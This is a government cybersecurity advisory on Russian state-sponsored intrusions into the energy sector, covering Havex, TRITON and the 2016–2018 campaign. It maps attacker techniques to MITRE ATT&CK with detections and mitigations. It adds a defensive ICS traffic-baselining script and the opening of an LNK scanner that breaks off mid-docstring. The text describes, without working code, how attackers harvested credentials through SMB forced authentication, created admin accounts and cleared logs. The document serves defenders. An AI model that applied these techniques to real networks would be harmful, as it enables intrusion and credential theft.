DOJ Indicts Russian Gov’t Employees Over Targeting Power Sector

The supply-chain attack on the U.S. energy sector targeted thousands of computers at hundreds of organizations, including at least one nuclear power plant.

CISA Adds 66 Known Exploited Vulnerabilities to Catalog

Original release date: March 25, 2022

CISA has added 66 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow of the “Date Added to Catalog” column, which will sort by descending dates.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.



AA22-083A: Tactics, Techniques, and Procedures of Indicted State-Sponsored Russian Cyber Actors Targeting the Energy Sector

Original release date: March 24, 2022

Summary

Actions to Take Today to Protect Energy Sector Networks:
• Implement and ensure robust network segmentation between IT and ICS networks.
• Enforce MFA to authenticate to a system.
• Manage the creation of, modification of, use of—and permissions associated with—privileged accounts.

This joint Cybersecurity Advisory (CSA)—coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Energy (DOE)—provides information on multiple intrusion campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 that targeted U.S. and international Energy Sector organizations. CISA, the FBI, and DOE responded to these campaigns with appropriate action in and around the time that they occurred. CISA, the FBI, and DOE are sharing this information in order to highlight historical tactics, techniques, and procedures (TTPs) used by adversaries to target U.S. and international Energy Sector organizations.

On March 24, 2022, the U.S. Department of Justice unsealed indictments of three Russian Federal Security Service (FSB) officers and a Russian Federation Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM) employee for their involvement in the following intrusion campaigns against U.S. and international oil refineries, nuclear facilities, and energy companies.[1]

  • Global Energy Sector Intrusion Campaign, 2011 to 2018: the FSB conducted a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data. 
    • One of the indicted FSB officers was involved in campaign activity that involved deploying Havex malware to victim networks. 
    • The other two indicted FSB officers were involved in activity targeting U.S. Energy Sector networks from 2016 through 2018.
  • Compromise of Middle East-based Energy Sector organization with TRITON Malware, 2017: Russian cyber actors with ties to the TsNIIKhM gained access to and leveraged TRITON (also known as HatMan) malware to manipulate a foreign oil refinery’s ICS controllers. TRITON was designed to specifically target Schneider Electric’s Triconex Tricon safety systems and is capable of disrupting those systems. Schneider Electric has issued a patch to mitigate the risk of the TRITON malware’s attack vector; however, network defenders should install the patch and remain vigilant against these threat actors’ TTPs.
    • The indicted TsNIIKhM cyber actor is charged with attempting to access U.S. protected computer networks and to cause damage to an energy facility.
    • The indicted TsNIIKhM cyber actor was a co-conspirator in the deployment of the TRITON malware in 2017.

This CSA provides the TTPs used by indicted FSB and TsNIIKhM actors in cyber operations against the global Energy Sector. Specifically, this advisory maps TTPs used in the global Energy Sector campaign and the compromise of the Middle East-based Energy Sector organization to the MITRE ATT&CK for Enterprise and ATT&CK for ICS frameworks.

CISA, the FBI, and DOE assess that state-sponsored Russian cyber operations continue to pose a threat to U.S. Energy Sector networks. CISA, the FBI, and DOE urge the Energy Sector and other critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory and Appendix A to reduce the risk of compromise. 

For more information on Russian state-sponsored malicious cyber activity, see CISA’s Russia Cyber Threat Overview and Advisories webpage. For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure as well as additional mitigation recommendations, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure and CISA’s Shields Up Technical Guidance webpage. 

Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s (DOS) Rewards for Justice program. You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to rewardsforjustice.net.


Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10, and the ATT&CK for ICS framework. See the ATT&CK for Enterprise and ATT&CK for ICS frameworks for all referenced threat actor tactics and techniques.

Global Energy Sector Intrusion Campaign, 2011 to 2018

From at least 2011 through 2018, the FSB (also known as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala) conducted an intrusion campaign against international and U.S. Energy Sector organizations. The threat actor gained remote access to and deployed malware designed to collect ICS-related information on compromised Energy Sector networks, and exfiltrated enterprise and ICS data.

Beginning in 2013 and continuing through 2014, the threat actor leveraged Havex malware on Energy Sector networks. The threat actor gained access to these victim networks via spearphishing emails, redirects to compromised websites, and malicious versions of legitimate software updates on multiple ICS vendor websites. The new software updates contained installations of Havex malware, which infected systems of users who downloaded the compromised updates.

Havex is a remote access Trojan (RAT) that communicates with a command and control (C2) server. The C2 server deploys payloads that enumerate all collected network resources and uses the Open Platform Communications (OPC) standard to gather information about connected control systems devices and resources within the network. Havex allowed the actor to install additional malware and extract data, including system information, lists of files and installed programs, e-mail address books, and virtual private network (VPN) configuration files. The Havex payload can cause common OPC platforms to crash, which could cause a denial-of-service condition on applications that rely on OPC communications. Note: for additional information on Havex, see CISA ICS Advisory ICS Focused Malware and CISA ICS Alert ICS Focused Malware (Update A).

Beginning in 2016, the threat actor began widely targeting U.S. Energy Sector networks. The actor conducted these attacks in two stages: first targeting third-party commercial organizations (such as vendors, integrators, and suppliers) and then targeting Energy Sector organizations. The threat actor used the compromised third-party infrastructure to conduct spearphishing, watering hole, and supply chain attacks to harvest Energy Sector credentials and to pivot to Energy Sector enterprise networks. After obtaining access to the U.S. Energy Sector networks, the actor conducted network discovery, moved laterally, gained persistence, then collected and exfiltrated information pertaining to ICS from the enterprise, and possibly operational technology (OT), environments. Exfiltrated information included: vendor information, reference documents, ICS architecture, and layout diagrams.

For more detailed information on FSB targeting of U.S. Energy Sector networks, see CISA Alert Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors.

Refer to Appendix A for TTPs of Havex malware and TTPs used by the actor in the 2016 to 2018 targeting of U.S. Energy Sector networks, as well as associated mitigations.

Compromise of Middle East-based Energy Sector Organization with TRITON Malware, 2017

In 2017, Russian cyber actors with ties to TsNIIKhM gained access to and manipulated a foreign oil refinery’s safety devices. TsNIIKhM actors used TRITON malware on the ICS controllers, which resulted in the refinery shutting down for several days. 

TRITON is a custom-built, sophisticated, multi-stage malware affecting Schneider Electric’s Triconex Tricon, a safety programmable logic controller (PLC) (also referred to as a safety instrumented system [SIS]), which monitors industrial processes to prevent hazardous conditions. TRITON is capable of directly interacting with, remotely controlling, and compromising these safety systems. As these systems are used in a large number of environments, the capacity to disable, inhibit, or modify the ability of a process to fail safely could result in physical consequences. Note: for additional information on affected products, see CISA ICS Advisory Schneider Electric Triconex Tricon (Update B).

TRITON malware affects Triconex Tricon PLCs by modifying in-memory firmware to add additional programming. The extra functionality allows an attacker to read/modify memory contents and execute custom code, disabling the safety system. 

TRITON malware has multiple components, including a custom Python script, four Python modules, and malicious shellcode that contains an injector and a payload. For detailed information on TRITON’s components, refer to CISA Malware Analysis Report (MAR): HatMan: Safety System Targeted Malware (Update B).

Note: the indicted TsNIIKhM cyber actor was also involved in activity targeting U.S. Energy Sector companies in 2018, and other TsNIIKhM-associated actors have targeted a U.S.-based company’s facilities in an attempt to access the company’s OT systems. To date, CISA, FBI, and DOE have no information to indicate these actors have intentionally disrupted any U.S. Energy Sector infrastructure. 

Refer to Appendix A for TTPs used by TRITON as well as associated mitigations. 

Mitigations

Enterprise Environment

CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their corporate enterprise network. These mitigations are tailored to combat multiple enterprise techniques observed in these campaigns (refer to Appendix A for observed TTPs and additional mitigations).

Privileged Account Management 
  • Manage the creation of, modification of, use of—and permissions associated with—privileged accounts, including SYSTEM and root.
Password Policies
  • Set and enforce secure password policies for accounts.
Disable or Remove Features or Programs
  • Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
Audit 
  • Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.
Operating System Configuration 
  • Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
Multifactor Authentication
  • Enforce multifactor authentication (MFA) by requiring users to provide two or more pieces of information (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.
Filter Network Traffic    
  • Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
Network Segmentation
  • Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a demilitarized zone (DMZ) to contain any internet-facing services that should not be exposed from the internal network.
Limit Access to Resources over the Network
  • Prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, Remote Desktop Protocol (RDP) gateways, etc.
Execution Prevention
  • Block execution of code on a system through application control, and/or script blocking.

Industrial Control System Environment

CISA, the FBI, and DOE recommend Energy Sector and other critical infrastructure organizations implement the following mitigations to harden their ICS/OT environment.

Network Segmentation
  • Implement and ensure robust network segmentation between IT and ICS networks to limit the ability of cyber threat actors to move laterally to ICS networks if the IT network is compromised. 
    • Implement a network topology for ICS that has multiple layers, with the most critical communications occurring in the most secure and reliable layer. For more information refer to National Institute of Standards and Technology Special Publication 800-82: Guide to Industrial Control Systems (ICS) Security. Further segmentation should be applied to portions of the network that are reliant on one another by functionality. Figure 5 on page 26 of the CISA ICS Defense in Depth Strategy document describes this architecture.
    • Use one-way communication diodes to prevent external access, whenever possible.
    • Set up DMZs to create a physical and logical subnetwork that acts as an intermediary for connected security devices to avoid exposure.
    • Employ reliable network security protocols and services where feasible.
  • Consider using virtual local area networks (VLANs) for additional network segmentation, for example, by placing all printers in separate, dedicated VLANs and restricting users’ direct printer access. This same principle can be applied to segmentation of portions of the process for which devices are used. As an example, systems that are only involved in the creation of one component within an assembly line that is not directly related to another component can be on separate VLANs, which allows for identification of any unexpected communication, as well as segmentation against potential risk exposure on a larger scale.
  • Implement perimeter security between network segments to limit the ability of cyber threat actors to move laterally. 
    • Control traffic between network segments by using firewalls, intrusion detection systems (IDSs), and rules for filtering traffic on routers and switches.
    • Implement network monitoring at key chokepoints—including egress points to the internet, between network segments, core switch locations—and at key assets or services (e.g., remote access services).
    • Configure an IDS to create alarms for any ICS traffic outside normal operations (after establishing a baseline of normal operations and network traffic).
    • Configure security incident and event monitoring to monitor, analyze, and correlate event logs from across the ICS network to identify intrusion attempts.
ICS Best Practices
  • Update all software. Use a risk-based assessment strategy to determine which ICS networks, assets, and zones should participate in the patch management program. 
  • Test all patches in out-of-band testing environments before implementation into production environments.
  • Implement application allow listing on human machine interfaces and engineering workstations.
  • Harden software configuration on field devices, including tablets and smartphones.
  • Replace all end-of-life software and hardware devices.
  • Disable unused ports and services on ICS devices (after testing to ensure this will not affect ICS operation).
  • Restrict and manage remote access software. Enforce MFA for remote access to ICS networks.
  • Configure encryption and security for network protocols within the ICS environment.
  • Do not allow vendors to connect their devices to the ICS network. Use of a compromised device could introduce malware. 
  • Disallow any devices that do not live solely on the ICS environment from communicating on the platform. ‘Transient devices’ provide risk exposure to the ICS environment from malicious activity in the IT or other environments to which they connect.
  • Maintain an ICS asset inventory of all hardware, software, and supporting infrastructure technologies. 
  • Maintain robust host logging on critical devices within the ICS environment, such as jump boxes, domain controllers, repository servers, etc. These logs should be aggregated into a centralized log server for review. 
  • Ensure robust physical security is in place to prevent unauthorized personnel from accessing controlled spaces that house ICS equipment.
  • Regularly test manual controls so that critical functions can be kept running if ICS/OT networks need to be taken offline.
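The baseline-then-alarm approach in the Network Segmentation bullets above (establish what normal ICS traffic looks like, then alarm on anything outside it at the chokepoints between segments and at internet egress) is shown below as an added example; it is not part of the advisory. Subnets, hosts and flow records are constructed for the example, and the port-to-protocol mapping uses the protocols' standard ports, with TCP 135 being the DCOM endpoint mapper through which OPC Classic servers (the kind Havex enumerated) are reached.

```python
"""Added example, not part of the CISA advisory.

Learn the set of conversations seen on the ICS segment during a known-good
period, then classify later flows: anything not in the baseline, anything
crossing from IT into ICS, any ICS host talking to the internet, and any
source that was never seen speaking an ICS protocol before raises an alarm.
"""
import ipaddress
from dataclasses import dataclass

ICS_NET = ipaddress.ip_network("10.20.0.0/16")   # constructed control-system segment
IT_NET = ipaddress.ip_network("10.10.0.0/16")    # constructed corporate segment

# Standard ports of common ICS protocols; 135 is the DCOM endpoint mapper
# used to reach OPC Classic servers.
ICS_PORTS = {102: "ISO-TSAP/S7", 135: "DCOM (OPC Classic)", 502: "Modbus/TCP",
             20000: "DNP3", 44818: "EtherNet/IP"}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    proto: str = "tcp"

    def key(self):
        return (self.src, self.dst, self.dport, self.proto)


# Constructed flows captured during a known-good baseline period.
BASELINE_FLOWS = [
    Flow("10.20.1.10", "10.20.5.1", 502),    # HMI -> PLC, Modbus
    Flow("10.20.1.20", "10.20.5.1", 102),    # engineering workstation -> PLC
    Flow("10.20.1.30", "10.20.2.5", 135),    # historian -> OPC server
    Flow("10.20.1.30", "10.10.8.9", 1433),   # historian -> approved IT replica
]

# Constructed flows from a later monitoring window.
OBSERVED_FLOWS = [
    Flow("10.20.1.10", "10.20.5.1", 502),    # in baseline, no alarm
    Flow("10.10.3.44", "10.20.2.5", 135),    # corporate host reaching the OPC server
    Flow("10.20.1.10", "10.20.5.2", 502),    # HMI talking to a PLC never seen before
    Flow("10.20.1.20", "203.0.113.7", 443),  # engineering workstation -> internet
]


def _segment(ip):
    """Place an address in the ICS segment, the IT segment, or 'external'."""
    addr = ipaddress.ip_address(ip)
    if addr in ICS_NET:
        return "ics"
    if addr in IT_NET:
        return "it"
    return "external"


def build_baseline(flows):
    """Record every conversation and, per ICS port, which sources used it."""
    conversations = {f.key() for f in flows}
    ics_talkers = {}
    for f in flows:
        if f.dport in ICS_PORTS:
            ics_talkers.setdefault(f.dport, set()).add(f.src)
    return {"conversations": conversations, "ics_talkers": ics_talkers}


def classify(flow, baseline):
    """Return the alarm reasons for one flow; an empty list means within baseline."""
    reasons = []
    if flow.key() not in baseline["conversations"]:
        reasons.append("new_conversation")
    src_seg, dst_seg = _segment(flow.src), _segment(flow.dst)
    if src_seg == "it" and dst_seg == "ics":
        reasons.append("it_to_ics_boundary")
    if src_seg == "ics" and dst_seg == "external":
        reasons.append("ics_egress_to_internet")
    if flow.dport in ICS_PORTS and \
            flow.src not in baseline["ics_talkers"].get(flow.dport, set()):
        reasons.append(f"unseen_source_for_{ICS_PORTS[flow.dport]}")
    return reasons


def alarms(flows, baseline):
    """Pair each out-of-baseline flow with its reasons."""
    return [(f, classify(f, baseline)) for f in flows if classify(f, baseline)]


if __name__ == "__main__":
    bl = build_baseline(BASELINE_FLOWS)
    for flow, why in alarms(OBSERVED_FLOWS, bl):
        print(f"ALARM {flow.src} -> {flow.dst}:{flow.dport} {', '.join(why)}")
```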

Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

References

[1] https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
[2] https://collaborate.mitre.org/attackics/index.php/Software/S0003
[3] https://collaborate.mitre.org/attackics/index.php/Software/S0003
[4] https://collaborate.mitre.org/attackics/index.php/Software/S0013

APPENDIX A: CAMPAIGN AND MALWARE TACTICS, TECHNIQUES, AND PROCEDURES

Global Energy Sector Campaign: Havex Malware 

Table 1 maps Havex’s capabilities to the ATT&CK for Enterprise framework, and table 2 maps Havex’s capabilities to the ATT&CK for ICS framework. Table 1 also provides associated mitigations. For additional mitigations, refer to the Mitigations section of this advisory.

Table 1: Enterprise Domain Tactics and Techniques for Havex [2]

Tactic Technique Use Detection/Mitigations

Persistence [TA0003]

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]

Havex adds Registry Run keys to achieve persistence.

Monitor: monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the startup folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys’ Registry locations and startup folders. Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.

Privilege Escalation [TA0004]

Process Injection [T1055]

Note: this technique also applies to:

  • Tactic: Defense Evasion [TA0005]

Havex injects itself into explorer.exe.

Behavior Prevention on Endpoint: use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, Application Programming Interface (API) call, etc., behavior.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Defense Evasion [TA0005]

Indicator Removal on Host: File Deletion [T1070.004]

Havex contains a cleanup module that removes traces of itself from victim networks.

Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network, which an adversary could introduce. Some monitoring tools may collect command-line arguments but may not capture DEL commands since DEL is a native function within cmd.exe.

Credential Access [TA0006]

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

Havex may contain a publicly available web browser password recovery tool.

Password Policies: set and enforce secure password policies for accounts.

Discovery [TA0007]

Account Discovery: Email Account [T1087.003]

Havex collects address book information from Outlook.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation (WMI) and PowerShell.

File and Directory Discovery [T1083]

Havex collects information about available drives, default browser, desktop file list, My Documents, internet history, program files, and root of available drives.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

Process Discovery [T1057]

Havex collects information about running processes.

Monitor: normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

System Information Discovery [T1082]

Havex collects information about the OS and computer name.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.

In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.

System Network Configuration Discovery [T1016]

Havex collects information about the internet adapter configuration.

Monitor: monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as WMI and PowerShell.
System Owner/User Discovery [T1033]

Havex collects usernames.

Collection [TA0009]

Archive Collected Data [T1560]

Havex writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.

Command and Control [TA0011]

Data Encoding: Standard Encoding [T1132.001]

Havex uses standard Base64 + bzip2 or standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.

Detect: analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes using the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.


Table 2: ICS Domain Tactics and Techniques for Havex [3]

Tactic Technique Use

Initial Access

Spearphishing Attachment [T0865]

Havex is distributed through a Trojanized installer attached to emails.

Supply Chain Compromise [T0862]

Note: this activity also applies to Tactic: Drive-by Compromise [T0817]

Havex is distributed through Trojanized installers planted on compromised vendor websites.

Execution

User Execution [T0863]

Execution of Havex relies on a user opening a Trojanized installer attached to an email.

Discovery

Remote System Discovery [T0846]

Havex uses Windows networking (WNet) to discover all the servers, including OPC servers, that are reachable by the compromised machine over the network.

Remote System Information Discovery [T0888]

Havex gathers server information, including CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.

Collection

Automated Collection [T0802]

Havex gathers information about connected control systems devices.

Point & Tag Identification [T0861]

Havex can enumerate OPC tags; specifically tag name, type, access, and ID.

Inhibit Response Function

Denial of Service [T0814]

Havex has caused multiple common OPC platforms to intermittently crash.

Impact

Denial of Control [T0813]

Havex can cause PLCs to lose the ability to control connected systems.


Global Energy Sector Campaign: 2016 to 2018 U.S. Energy Sector Targeting

Table 3 maps the 2016 to 2018 U.S. Energy Sector targeting activity to the MITRE ATT&CK Enterprise framework. Mitigations for techniques are also provided in table 3. For additional mitigations, refer to the Mitigations section of this advisory.

Table 3: Energy Sector Campaign, 2016 to 2018 targeting U.S. Energy Sector: Observed MITRE ATT&CK Enterprise Tactics and Techniques

Tactic Technique Use Detection/Mitigations

Reconnaissance [TA0043]

Gather Victim Identity Information: Credentials [T1589.001]

The threat actor harvested credentials of third-party commercial organizations by sending spearphishing emails that contained a PDF attachment. The PDF attachment contained a shortened URL that, when clicked, led users to a website that prompted the user for their email address and password.
The threat actor harvested credentials of Energy Sector targets by sending spearphishing emails with a malicious Microsoft Word document or links to the watering holes created on compromised third-party websites.

Note: this activity also applies to: 

  • Tactic: Reconnaissance [TA0043], Technique: Phishing for Information [T1598]

Software Configuration: implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Resource Development [TA0042]

Compromise Infrastructure: Server [T1584.004]

The threat actor created watering holes on compromised third-party organizations’ domains.

This activity typically takes place outside the visibility of target organizations, making detection of this behavior difficult. Ensure that users browse the internet securely. Prevent intentional and unintentional download of malware or rootkits, and users from accessing infected or malicious websites. Treat all traffic as untrusted, even if it comes from a partner website or popular domain.

Initial Access [TA0001]

Valid Accounts [T1078]

The threat actor obtained access to Energy Sector targets by leveraging compromised third-party infrastructure and previously compromised Energy Sector credentials against remote access services and infrastructure—specifically VPN, RDP, and Outlook Web Access—where MFA was not enabled.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Update Software: perform regular software updates to mitigate exploitation risk.

Exploit Protection: use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

Application Isolation and Sandboxing: restrict execution of code to a virtual environment on or in transit to an endpoint system.

External Remote Services [T1133]

The threat actor installed VPN clients on compromised third-party targets to connect to Energy Sector networks.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Execution [TA0002]

Command and Scripting Interpreter: PowerShell [T1059.001]

During an RDP session, the threat actor used a PowerShell Script to create an account within a victim’s Microsoft Exchange Server. 

Note: this activity also applies to: 

  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]

Antivirus/Antimalware: use signatures or heuristics to detect malicious software.

Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Command and Scripting Interpreter: Windows Command Shell [T1059.003]

The threat actor used a JavaScript file with an embedded Command Shell script to:

  • Create a local administrator account; 
  • Disable the host-based firewall;
  • Globally open port 3389 for RDP access; and
  • Attempt to add the newly created account to the administrators group to gain elevated privileges. 

Note: this activity also applies to: 

  • Tactic: Credential Access [TA0006], Technique: Input Capture [T1056]
  • Tactic: Execution [TA0002], Technique: Command and Scripting Interpreter: JavaScript [T1059.007]
  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]

Execution Prevention: block execution of code on a system through application control, and/or script blocking.

Scheduled Task/Job: Scheduled Task [T1053.005]

The threat actor created a Scheduled Task to automatically log out of a newly created account every eight hours.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.

Harden Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Account Management: manage the creation of, modification of, use of, and permissions associated with user accounts.

Persistence [TA0003]

Create Account: Local Account [T1136.001]

The threat actor created local administrator accounts on previously compromised third-party organizations for reconnaissance and to remotely access Energy Sector targets.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Server Software Component: Web Shell [T1505.003]

The threat actor created webshells on Energy Sector targets’ publicly accessible email and web servers.

Detect: the portion of the webshell that is on the server may be small and look innocuous. Process monitoring may be used to detect web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the web directory. File monitoring may be used to detect changes to files in the web directory of a web server that do not match with updates to the web server’s content and may indicate implantation of a web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network.

Defense Evasion [TA0005]

Indicator Removal on Host: Clear Windows Event Logs [T1070.001]

The threat actor created new accounts on victim networks to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. 

The threat actor also removed applications they installed while they were in the network along with any logs produced. For example, the VPN client installed at one third-party commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.

Note: this activity also applies to:

  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]

Encrypt Sensitive Information: protect sensitive information with strong encryption.

Remote Data Storage: use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.

Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

Indicator Removal on Host: File Deletion [T1070.004]

The threat actor cleaned up target networks by deleting created screenshots and specific registry keys. 

The threat actor also deleted all batch scripts, output text documents, and any tools they brought into the environment, such as scr.exe.

Note: this activity also applies to:

  • Technique: Modify Registry [T1112]

Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.

Masquerading [T1036]

After downloading tools from a remote server, the threat actor renamed the extensions.

Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

Execution Prevention: block execution of code on a system through application control, and/or script blocking.

Credential Access [TA0006]

Brute Force: Password Cracking [T1110.002]

The threat actor used password-cracking techniques to obtain the plaintext passwords from obtained credential hashes.

The threat actor dropped and executed open-source and free password cracking tools such as Hydra, SecretsDump, and CrackMapExec, as well as Python.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Password Policies: set and enforce secure password policies for accounts.

Forced Authentication [T1187]

Microsoft Word attachments sent via spearphishing emails leveraged legitimate Microsoft Office functions for retrieving a document from a remote server over Server Message Block (SMB) using Transmission Control Protocol ports 445 or 139. As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.)

Password Policies: set and enforce secure password policies for accounts.

Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

The threat actor’s watering hole sites contained altered JavaScript and PHP files that requested a file icon using SMB from an IP address controlled by the threat actors.

The threat actor manipulated LNK files to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actor exploited this built-in Windows functionality by setting the icon path to a remote server controlled by the actors. When the user browses to the directory, Windows attempts to load the icon and initiates an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.

Note: this activity also applies to:

  • Tactic: Persistence [TA0003], Technique: Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]
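
The icon-path abuse described above can be found on file shares before a user ever browses to the folder. The following is an added example, not code from the advisory: a small parser for the Shell Link (.lnk) binary format that reads the ICON_LOCATION string and flags icon paths that point at a remote host; the sample .lnk bytes and the host name in them are constructed placeholders.

```python
"""Scan .lnk files for icon paths that point at a remote host.

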